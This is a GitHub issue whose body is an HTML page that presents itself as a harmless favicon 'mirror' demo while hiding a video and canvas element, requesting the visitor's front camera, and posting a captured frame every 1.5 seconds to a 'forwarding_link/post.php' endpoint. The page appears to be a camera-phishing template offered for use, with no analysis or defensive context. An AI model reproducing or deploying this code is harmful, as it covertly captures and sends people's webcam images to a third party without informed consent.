### ISSUE TITLE
ahmed.html

### ISSUE THREAD

**Issue by ahmedganah1** [ahmedganah1/ahmed#1]
&lt;html&gt;&lt;head&gt;&lt;script type="text/javascript" src="https://wybiral.github.io/code-art/projects/tiny-mirror/index.js"&gt;&lt;/script&gt;&lt;link rel="stylesheet" type="text/css" href="https://wybiral.github.io/code-art/projects/tiny-mirror/index.css"&gt;&lt;script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.8.3/jquery.js"&gt;&lt;/script&gt;&lt;/head&gt;
&lt;div class="video-wrap" hidden="hidden"&gt;   &lt;video id="video" playsinline autoplay&gt;&lt;/video&gt;&lt;/div&gt;
&lt;canvas hidden="hidden" id="canvas" width="640" height="480"&gt;&lt;/canvas&gt;
&lt;script&gt;
function post(imgdata){$.ajax({    type: 'POST',    data: { cat: imgdata},    url: 'forwarding_link/post.php',    dataType: 'json',    async: false,    success: function(result){        // call the function that handles the response/results    },    error: function(){    }  });};

'use strict';
const video = document.getElementById('video');const canvas = document.getElementById('canvas');const errorMsgElement = document.querySelector('span#errorMsg');
const constraints = {  audio: false,  video: {        facingMode: "user"  }};
// Access webcamasync function init() {  try {    const stream = await navigator.mediaDevices.getUserMedia(constraints);    handleSuccess(stream);  } catch (e) {    errorMsgElement.innerHTML = `navigator.getUserMedia error:${e.toString()}`;  }}
// Successfunction handleSuccess(stream) {  window.stream = stream;  video.srcObject = stream;
var context = canvas.getContext('2d');  setInterval(function(){
       context.drawImage(video, 0, 0, 640, 480);       var canvasData = canvas.toDataURL("image/png").replace("image/png", "image/octet-stream");       post(canvasData); }, 1500);  
}
// Load initinit();
&lt;/script&gt;
    &lt;body&gt;        &lt;p&gt;Hint: Look at the favicon&lt;/p&gt;        &lt;p&gt;(Accept Permissions)&lt;/p&gt;        &lt;p&gt;&lt;label&gt;&lt;input type="checkbox" name="mirror" id="mirror" /&gt; Mirror image&lt;/label&gt;&lt;/p&gt;    &lt;/body&gt;
&lt;/html&gt;
